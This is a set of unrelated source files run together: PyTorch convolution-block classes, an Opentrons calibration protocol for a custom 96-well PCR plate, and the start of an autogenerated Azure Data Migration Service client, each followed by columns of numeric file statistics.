        self.__dw3 = Directional_Dynamic_Convolutional(filters_in=filters_in, filters_out=filters_in,
                                                       kernel_size=3, stride=1, pad=6, dila=6, groups=2,
                                                       bias=False, type='tri', norm="bn", activate='leaky')
        # Fuse the 4-way concatenation back down to filters_in channels.
        self.__pw1 = Convolutional(filters_in=filters_in * 4, filters_out=filters_in,
                                   kernel_size=1, stride=1, pad=0, norm="bn", activate="MEMish")
        # DropBlock regularization, linearly ramped from 0 to 0.1 over 5 steps.
        self.__drop = LinearScheduler(DropBlock2D(block_size=3, drop_prob=0.1),
                                      start_value=0., stop_value=0.1, nr_steps=5)

    def forward(self, x):
        stem = self.__drop(self.__dw0(x))
        base = self.__pw0(stem)
        branch1 = self.__dw1(base)
        branch2 = self.__dw2(base) + branch1
        branch3 = self.__dw3(base) + branch2
        return self.__pw1(torch.cat((base, branch1, branch2, branch3), 1))
class MSR_Convset_M_R(nn.Module):
    """Medium multi-scale conv set, rotated variant: same topology as
    MSR_Convset_M but the 3x3 stages use Directional_Dynamic_Convolutional
    (groups=2, type='tri')."""

    def __init__(self, filters_in):
        super(MSR_Convset_M_R, self).__init__()
        # Expand to 2x channels with a directional dynamic conv, then squeeze.
        self.__dw0 = Directional_Dynamic_Convolutional(filters_in=filters_in, filters_out=filters_in * 2,
                                                       kernel_size=3, stride=1, pad=1, dila=1, groups=2,
                                                       bias=False, type='tri', norm="bn", activate='leaky')
        self.__pw0 = Convolutional(filters_in=filters_in * 2, filters_out=filters_in,
                                   kernel_size=1, stride=1, pad=0, norm="bn", activate="leaky")
        # Directional dilated branches (dilation 1 and 2).
        self.__dw1 = Directional_Dynamic_Convolutional(filters_in=filters_in, filters_out=filters_in,
                                                       kernel_size=3, stride=1, pad=1, dila=1, groups=2,
                                                       bias=False, type='tri', norm="bn", activate='leaky')
        self.__dw2 = Directional_Dynamic_Convolutional(filters_in=filters_in, filters_out=filters_in,
                                                       kernel_size=3, stride=1, pad=2, dila=2, groups=2,
                                                       bias=False, type='tri', norm="bn", activate='leaky')
        # Fuse the 2-way concatenation back down to filters_in channels.
        self.__pw1 = Convolutional(filters_in=filters_in * 2, filters_out=filters_in,
                                   kernel_size=1, stride=1, pad=0, norm="bn", activate="MEMish")
        # DropBlock regularization, linearly ramped from 0 to 0.1 over 5 steps.
        self.__drop = LinearScheduler(DropBlock2D(block_size=3, drop_prob=0.1),
                                      start_value=0., stop_value=0.1, nr_steps=5)

    def forward(self, x):
        stem = self.__drop(self.__dw0(x))
        base = self.__pw0(stem)
        branch1 = self.__dw1(base)
        branch2 = self.__dw2(base) + branch1
        return self.__pw1(torch.cat((branch1, branch2), 1))
class MSR_Convset_S_R(nn.Module):
    """Small conv set, rotated variant: same topology as MSR_Convset_S but the
    3x3 stages use Directional_Dynamic_Convolutional (groups=2, type='tri')."""

    def __init__(self, filters_in):
        super(MSR_Convset_S_R, self).__init__()
        # First expand/squeeze stage (directional dynamic 3x3, then 1x1).
        self.__dw0 = Directional_Dynamic_Convolutional(filters_in=filters_in, filters_out=filters_in * 2,
                                                       kernel_size=3, stride=1, pad=1, dila=1, groups=2,
                                                       bias=False, type='tri', norm="bn", activate='leaky')
        self.__pw0 = Convolutional(filters_in=filters_in * 2, filters_out=filters_in,
                                   kernel_size=1, stride=1, pad=0, norm="bn", activate="leaky")
        # Second expand/squeeze stage.
        self.__dw1 = Directional_Dynamic_Convolutional(filters_in=filters_in, filters_out=filters_in * 2,
                                                       kernel_size=3, stride=1, pad=1, dila=1, groups=2,
                                                       bias=False, type='tri', norm="bn", activate='leaky')
        self.__pw1 = Convolutional(filters_in=filters_in * 2, filters_out=filters_in,
                                   kernel_size=1, stride=1, pad=0, norm="bn", activate="leaky")
        # DropBlock regularization, linearly ramped from 0 to 0.1 over 5 steps.
        self.__drop = LinearScheduler(DropBlock2D(block_size=3, drop_prob=0.1),
                                      start_value=0., stop_value=0.1, nr_steps=5)

    def forward(self, x):
        y = self.__drop(self.__dw0(x))
        y = self.__pw0(y)
        y = self.__dw1(y)
        return self.__pw1(y)
| 61.639241
| 210
| 0.597597
| 1,303
| 9,739
| 4.126631
| 0.053722
| 0.170727
| 0.154733
| 0.172587
| 0.974521
| 0.971545
| 0.966152
| 0.966152
| 0.966152
| 0.966152
| 0
| 0.049034
| 0.277544
| 9,739
| 158
| 211
| 61.639241
| 0.715179
| 0.034603
| 0
| 0.811189
| 0
| 0
| 0.02521
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083916
| false
| 0
| 0.027972
| 0
| 0.195804
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9ed083fda6c94c054677770a5a79aa8f06254e35
| 23,176
|
py
|
Python
|
custom_labware/PCR_Plate_Tethys/test_tethystestrun2.py
|
Microbiaki-Lab/Opentrons
|
0b50b63275377881433555941ae7f53ceeb64554
|
[
"MIT"
] | null | null | null |
custom_labware/PCR_Plate_Tethys/test_tethystestrun2.py
|
Microbiaki-Lab/Opentrons
|
0b50b63275377881433555941ae7f53ceeb64554
|
[
"MIT"
] | null | null | null |
custom_labware/PCR_Plate_Tethys/test_tethystestrun2.py
|
Microbiaki-Lab/Opentrons
|
0b50b63275377881433555941ae7f53ceeb64554
|
[
"MIT"
] | null | null | null |
import json
from opentrons import protocol_api, types
# Deck slot where the labware under test is placed for calibration.
TEST_LABWARE_SLOT = '5'
# Fraction of the default gantry speeds used while probing, so the
# operator can watch each move and pause safely.
RATE = 0.25 # % of default speeds
# Mount and model of the pipette performing the test run.
PIPETTE_MOUNT = 'right'
PIPETTE_NAME = 'p300_multi_gen2'
# Tip rack slot and load name; a tip is picked up before probing wells.
TIPRACK_SLOT = '11'
TIPRACK_LOADNAME = 'opentrons_96_tiprack_300ul'
LABWARE_DEF_JSON = """{"ordering":[["A1","B1","C1","D1","E1","F1","G1","H1"],["A2","B2","C2","D2","E2","F2","G2","H2"],["A3","B3","C3","D3","E3","F3","G3","H3"],["A4","B4","C4","D4","E4","F4","G4","H4"],["A5","B5","C5","D5","E5","F5","G5","H5"],["A6","B6","C6","D6","E6","F6","G6","H6"],["A7","B7","C7","D7","E7","F7","G7","H7"],["A8","B8","C8","D8","E8","F8","G8","H8"],["A9","B9","C9","D9","E9","F9","G9","H9"],["A10","B10","C10","D10","E10","F10","G10","H10"],["A11","B11","C11","D11","E11","F11","G11","H11"],["A12","B12","C12","D12","E12","F12","G12","H12"]],"brand":{"brand":"thermofischer","brandId":["applied biosystems 4473712"]},"metadata":{"displayName":"Tethys test run 2","displayCategory":"wellPlate","displayVolumeUnits":"µL","tags":[]},"dimensions":{"xDimension":127.7,"yDimension":85.48,"zDimension":24.43},"wells":{"A1":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":14.38,"y":74.24,"z":3.78},"B1":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":14.38,"y":65.24,"z":3.78},"C1":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":14.38,"y":56.24,"z":3.78},"D1":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":14.38,"y":47.24,"z":3.78},"E1":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":14.38,"y":38.24,"z":3.78},"F1":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":14.38,"y":29.24,"z":3.78},"G1":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":14.38,"y":20.24,"z":3.78},"H1":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":14.38,"y":11.24,"z":3.78},"A2":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":23.38,"y":74.24,"z":3.78},"B2":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":23.38,"y":65.24,"z":3.78},"C2":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.4
3,"x":23.38,"y":56.24,"z":3.78},"D2":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":23.38,"y":47.24,"z":3.78},"E2":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":23.38,"y":38.24,"z":3.78},"F2":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":23.38,"y":29.24,"z":3.78},"G2":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":23.38,"y":20.24,"z":3.78},"H2":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":23.38,"y":11.24,"z":3.78},"A3":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":32.38,"y":74.24,"z":3.78},"B3":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":32.38,"y":65.24,"z":3.78},"C3":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":32.38,"y":56.24,"z":3.78},"D3":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":32.38,"y":47.24,"z":3.78},"E3":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":32.38,"y":38.24,"z":3.78},"F3":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":32.38,"y":29.24,"z":3.78},"G3":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":32.38,"y":20.24,"z":3.78},"H3":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":32.38,"y":11.24,"z":3.78},"A4":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":41.38,"y":74.24,"z":3.78},"B4":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":41.38,"y":65.24,"z":3.78},"C4":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":41.38,"y":56.24,"z":3.78},"D4":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":41.38,"y":47.24,"z":3.78},"E4":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":41.38,"y":38.24,"z":3.78},"F4":{
"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":41.38,"y":29.24,"z":3.78},"G4":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":41.38,"y":20.24,"z":3.78},"H4":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":41.38,"y":11.24,"z":3.78},"A5":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":50.38,"y":74.24,"z":3.78},"B5":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":50.38,"y":65.24,"z":3.78},"C5":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":50.38,"y":56.24,"z":3.78},"D5":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":50.38,"y":47.24,"z":3.78},"E5":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":50.38,"y":38.24,"z":3.78},"F5":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":50.38,"y":29.24,"z":3.78},"G5":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":50.38,"y":20.24,"z":3.78},"H5":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":50.38,"y":11.24,"z":3.78},"A6":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":59.38,"y":74.24,"z":3.78},"B6":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":59.38,"y":65.24,"z":3.78},"C6":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":59.38,"y":56.24,"z":3.78},"D6":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":59.38,"y":47.24,"z":3.78},"E6":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":59.38,"y":38.24,"z":3.78},"F6":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":59.38,"y":29.24,"z":3.78},"G6":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":59.38,"y":20.24,"z":3.78},"H6":{"depth":20.65,"totalLiquidVolume":200,
"shape":"circular","diameter":5.43,"x":59.38,"y":11.24,"z":3.78},"A7":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":68.38,"y":74.24,"z":3.78},"B7":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":68.38,"y":65.24,"z":3.78},"C7":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":68.38,"y":56.24,"z":3.78},"D7":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":68.38,"y":47.24,"z":3.78},"E7":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":68.38,"y":38.24,"z":3.78},"F7":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":68.38,"y":29.24,"z":3.78},"G7":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":68.38,"y":20.24,"z":3.78},"H7":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":68.38,"y":11.24,"z":3.78},"A8":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":77.38,"y":74.24,"z":3.78},"B8":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":77.38,"y":65.24,"z":3.78},"C8":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":77.38,"y":56.24,"z":3.78},"D8":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":77.38,"y":47.24,"z":3.78},"E8":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":77.38,"y":38.24,"z":3.78},"F8":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":77.38,"y":29.24,"z":3.78},"G8":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":77.38,"y":20.24,"z":3.78},"H8":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":77.38,"y":11.24,"z":3.78},"A9":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":86.38,"y":74.24,"z":3.78},"B9":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x"
:86.38,"y":65.24,"z":3.78},"C9":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":86.38,"y":56.24,"z":3.78},"D9":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":86.38,"y":47.24,"z":3.78},"E9":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":86.38,"y":38.24,"z":3.78},"F9":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":86.38,"y":29.24,"z":3.78},"G9":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":86.38,"y":20.24,"z":3.78},"H9":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":86.38,"y":11.24,"z":3.78},"A10":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":95.38,"y":74.24,"z":3.78},"B10":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":95.38,"y":65.24,"z":3.78},"C10":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":95.38,"y":56.24,"z":3.78},"D10":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":95.38,"y":47.24,"z":3.78},"E10":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":95.38,"y":38.24,"z":3.78},"F10":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":95.38,"y":29.24,"z":3.78},"G10":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":95.38,"y":20.24,"z":3.78},"H10":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":95.38,"y":11.24,"z":3.78},"A11":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":104.38,"y":74.24,"z":3.78},"B11":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":104.38,"y":65.24,"z":3.78},"C11":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":104.38,"y":56.24,"z":3.78},"D11":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":104.38,"y":47.24,"z":3
.78},"E11":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":104.38,"y":38.24,"z":3.78},"F11":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":104.38,"y":29.24,"z":3.78},"G11":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":104.38,"y":20.24,"z":3.78},"H11":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":104.38,"y":11.24,"z":3.78},"A12":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":113.38,"y":74.24,"z":3.78},"B12":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":113.38,"y":65.24,"z":3.78},"C12":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":113.38,"y":56.24,"z":3.78},"D12":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":113.38,"y":47.24,"z":3.78},"E12":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":113.38,"y":38.24,"z":3.78},"F12":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":113.38,"y":29.24,"z":3.78},"G12":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":113.38,"y":20.24,"z":3.78},"H12":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":113.38,"y":11.24,"z":3.78}},"groups":[{"metadata":{"wellBottomShape":"flat"},"wells":["A1","B1","C1","D1","E1","F1","G1","H1","A2","B2","C2","D2","E2","F2","G2","H2","A3","B3","C3","D3","E3","F3","G3","H3","A4","B4","C4","D4","E4","F4","G4","H4","A5","B5","C5","D5","E5","F5","G5","H5","A6","B6","C6","D6","E6","F6","G6","H6","A7","B7","C7","D7","E7","F7","G7","H7","A8","B8","C8","D8","E8","F8","G8","H8","A9","B9","C9","D9","E9","F9","G9","H9","A10","B10","C10","D10","E10","F10","G10","H10","A11","B11","C11","D11","E11","F11","G11","H11","A12","B12","C12","D12","E12","F12","G12","H12"]}],"parameters":{"format":"irregular","quirks":[],"isTiprack":false,"isMagneticModuleCompatible":fal
se,"loadName":"tethystestrun2"},"namespace":"custom_beta","version":1,"schemaVersion":2,"cornerOffsetFromSlot":{"x":0,"y":0,"z":0}}"""
# Parse the embedded labware definition and derive the values the test
# protocol needs from it.
LABWARE_DEF = json.loads(LABWARE_DEF_JSON)
LABWARE_LABEL = LABWARE_DEF.get('metadata', {}).get(
    'displayName', 'test labware')
# Front-to-back footprint (mm) of the labware, used below to decide
# whether a reservoir is tall enough to calibrate with a multichannel.
# BUG FIX: the original read 'yDimension' from the 'A1' *well* entry,
# which only has depth/diameter/x/y/z keys, so this was always None and
# the later `LABWARE_DIMENSIONS >= 71.2` checks would raise TypeError.
# The value lives in the top-level 'dimensions' object.
LABWARE_DIMENSIONS = LABWARE_DEF.get('dimensions', {}).get('yDimension')

metadata = {'apiLevel': '2.0'}
def run(protocol: protocol_api.ProtocolContext):
    """Calibration test run for the custom labware definition.

    Loads the labware from LABWARE_DEF, picks up a tip, then moves the
    pipette to the top, the four inside edges, and the bottom of
    representative wells, pausing after each move so the operator can
    visually confirm the definition is accurate.

    :param protocol: Opentrons protocol context supplied by the robot.
    """
    tiprack = protocol.load_labware(TIPRACK_LOADNAME, TIPRACK_SLOT)
    pipette = protocol.load_instrument(
        PIPETTE_NAME, PIPETTE_MOUNT, tip_racks=[tiprack])
    test_labware = protocol.load_labware_from_definition(
        LABWARE_DEF,
        TEST_LABWARE_SLOT,
        LABWARE_LABEL,
    )

    num_cols = len(LABWARE_DEF.get('ordering', [[]]))
    num_rows = len(LABWARE_DEF.get('ordering', [[]])[0])
    total = num_cols * num_rows
    pipette.pick_up_tip()

    PAUSE_MSG = "If the position is accurate click 'resume.'"

    def set_speeds(rate):
        # Scale every gantry axis by `rate`; the pipette default speed is
        # capped at the fastest axis so all moves stay observable.
        protocol.max_speeds.update({
            'X': (600 * rate),
            'Y': (400 * rate),
            'Z': (125 * rate),
            'A': (125 * rate),
        })
        speed_max = max(protocol.max_speeds.values())
        for instr in protocol.loaded_instruments.values():
            instr.default_speed = speed_max

    def well_edges(well, reservoir=False):
        # Four probe points just inside the well rim.  Reservoir wells use
        # y-offsets biased toward the back so the nozzle stays inside the
        # single long well.
        if reservoir:
            offsets = [(-1, 1, 'left'), (1, 1, 'right'),
                       (0, 0.75, 'front'), (0, 1, 'back')]
        else:
            offsets = [(-1, 0, 'left'), (1, 0, 'right'),
                       (0, -1, 'front'), (0, 1, 'back')]
        return [(well._from_center_cartesian(x=x, y=y, z=1), name)
                for x, y, name in offsets]

    def probe_edges(well, reservoir=False):
        # Visit each edge of `well`, pausing for operator confirmation.
        for edge_pos, _edge_name in well_edges(well, reservoir):
            set_speeds(RATE)
            edge_location = types.Location(point=edge_pos, labware=None)
            pipette.move_to(edge_location)
            protocol.pause(PAUSE_MSG)

    def probe_top_then_edges(well, reservoir=False):
        # Top of the well first, then the four edges.
        set_speeds(RATE)
        pipette.move_to(well.top())
        protocol.pause(PAUSE_MSG)
        probe_edges(well, reservoir)

    def probe_bottom_and_blow_out(well):
        # Final depth check for a well, then clear the tip.
        pipette.move_to(well.bottom())
        protocol.pause(PAUSE_MSG)
        pipette.blow_out(well)

    # LABWARE_DIMENSIONS can legitimately be None when the definition lacks
    # the looked-up key; guard the comparison so such labware falls through
    # to the "incompatible" message instead of raising TypeError.
    y_dim_ok = LABWARE_DIMENSIONS is not None and LABWARE_DIMENSIONS >= 71.2

    set_speeds(RATE)
    pipette.home()
    single_channel_pipettes = (
        'p20_single_gen2', 'p300_single_gen2', 'p1000_single_gen2',
        'p50_single', 'p10_single', 'p300_single', 'p1000_single')
    if PIPETTE_NAME in single_channel_pipettes:
        # testing with single channel: first well, then (if any) last well
        first_well = test_labware.well('A1')
        probe_top_then_edges(first_well)
        if total > 1:
            # last well testing
            last_well = test_labware.well((num_cols * num_rows) - 1)
            probe_edges(last_well)
            set_speeds(RATE)
            # test bottom of last well
            probe_bottom_and_blow_out(last_well)
        else:
            # single-well labware: test bottom of the only well
            probe_bottom_and_blow_out(first_well)
    else:
        # testing for multichannel
        if total == 96 or total == 384:
            # test first column (96 well plates and 384 first column)
            probe_top_then_edges(test_labware.well('A1'))
            if total == 96:
                # test last column
                last_col_well = test_labware.well(
                    (num_cols * num_rows) - num_rows)
                probe_edges(last_col_well)
                set_speeds(RATE)
                # test bottom of last column
                probe_bottom_and_blow_out(last_col_well)
            else:
                # 384 well plates - need to hit well 369, last column.
                # NOTE(review): `total - num_rows + 1` is index 369 in the
                # 0-based well list; kept as in the original to preserve
                # behavior, but confirm it targets the intended well.
                well369 = test_labware.well(total - num_rows + 1)
                probe_top_then_edges(well369)
                set_speeds(RATE)
                # test bottom of last column
                probe_bottom_and_blow_out(well369)
        elif num_rows == 1 and total > 1 and y_dim_ok:
            # for 1 row reservoirs - ex: 12 well reservoirs
            probe_top_then_edges(test_labware.well('A1'), reservoir=True)
            # test last well
            last_well = test_labware.well(-1)
            probe_edges(last_well, reservoir=True)
            # test bottom of last well
            probe_bottom_and_blow_out(last_well)
        elif total == 1 and y_dim_ok:
            # for 1 well reservoirs
            only_well = test_labware.well('A1')
            probe_top_then_edges(only_well, reservoir=True)
            # test bottom of the well
            probe_bottom_and_blow_out(only_well)
        else:
            # for incompatible labwares
            protocol.pause("labware is incompatible to calibrate with a multichannel pipette")

    set_speeds(1.0)
    pipette.return_tip()
| 91.604743
| 12,134
| 0.588583
| 3,565
| 23,176
| 3.733801
| 0.082749
| 0.050485
| 0.064909
| 0.187514
| 0.852378
| 0.836376
| 0.836376
| 0.774172
| 0.774172
| 0.769589
| 0
| 0.135845
| 0.156067
| 23,176
| 253
| 12,135
| 91.604743
| 0.544711
| 0.022868
| 0
| 0.684729
| 0
| 0.004926
| 0.595262
| 0.535334
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009852
| false
| 0
| 0.009852
| 0
| 0.019704
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
7301afa3e7cacd4dea839989edb6b73691c60742
| 49,098
|
py
|
Python
|
src/dms_ext/azext_dms/vendored_sdks/datamigration/operations/services_operations.py
|
dwj300/azure-cli-extensions
|
9b929cacba1ce66bbc2e57c93de0d710cd97c567
|
[
"MIT"
] | null | null | null |
src/dms_ext/azext_dms/vendored_sdks/datamigration/operations/services_operations.py
|
dwj300/azure-cli-extensions
|
9b929cacba1ce66bbc2e57c93de0d710cd97c567
|
[
"MIT"
] | null | null | null |
src/dms_ext/azext_dms/vendored_sdks/datamigration/operations/services_operations.py
|
dwj300/azure-cli-extensions
|
9b929cacba1ce66bbc2e57c93de0d710cd97c567
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrest.exceptions import DeserializationError
from msrestazure.azure_operation import AzureOperationPoller
from .. import models
class ServicesOperations(object):
"""ServicesOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Version of the API. Constant value: "2018-07-15-preview".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
    """Store the service client, configuration and (de)serializers.

    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
    self._client = client
    self._serialize = serializer
    self._deserialize = deserializer
    # Constant API version sent as the 'api-version' query parameter.
    self.api_version = "2018-07-15-preview"
    self.config = config
def _create_or_update_initial(
        self, parameters, group_name, service_name, custom_headers=None, raw=False, **operation_config):
    """Send the initial PUT for create_or_update and deserialize the
    immediate response; long-running polling is done by the public wrapper.
    """
    # Construct URL
    url = self.create_or_update.metadata['url']
    path_format_arguments = {
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        'groupName': self._serialize.url("group_name", group_name, 'str'),
        'serviceName': self._serialize.url("service_name", service_name, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        # Per-request correlation id for service-side tracing.
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct body
    body_content = self._serialize.body(parameters, 'DataMigrationService')

    # Construct and send request
    request = self._client.put(url, query_parameters)
    response = self._client.send(
        request, header_parameters, body_content, stream=False, **operation_config)

    if response.status_code not in [200, 201, 202]:
        raise models.ApiErrorException(self._deserialize, response)

    deserialized = None

    # 200 (updated) and 201 (created) carry the resource body; a 202 is
    # accepted without deserializing anything.
    if response.status_code == 200:
        deserialized = self._deserialize('DataMigrationService', response)
    if response.status_code == 201:
        deserialized = self._deserialize('DataMigrationService', response)

    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response

    return deserialized
def create_or_update(
        self, parameters, group_name, service_name, custom_headers=None, raw=False, **operation_config):
    """Create or update DMS Instance.

    The services resource is the top-level resource that represents the
    Database Migration Service. The PUT method creates a new service or
    updates an existing one. When a service is updated, existing child
    resources (i.e. tasks) are unaffected. Services currently support a
    single kind, "vm", which refers to a VM-based service, although other
    kinds may be added in the future. This method can change the kind, SKU,
    and network of the service, but if tasks are currently running (i.e.
    the service is busy), this will fail with 400 Bad Request
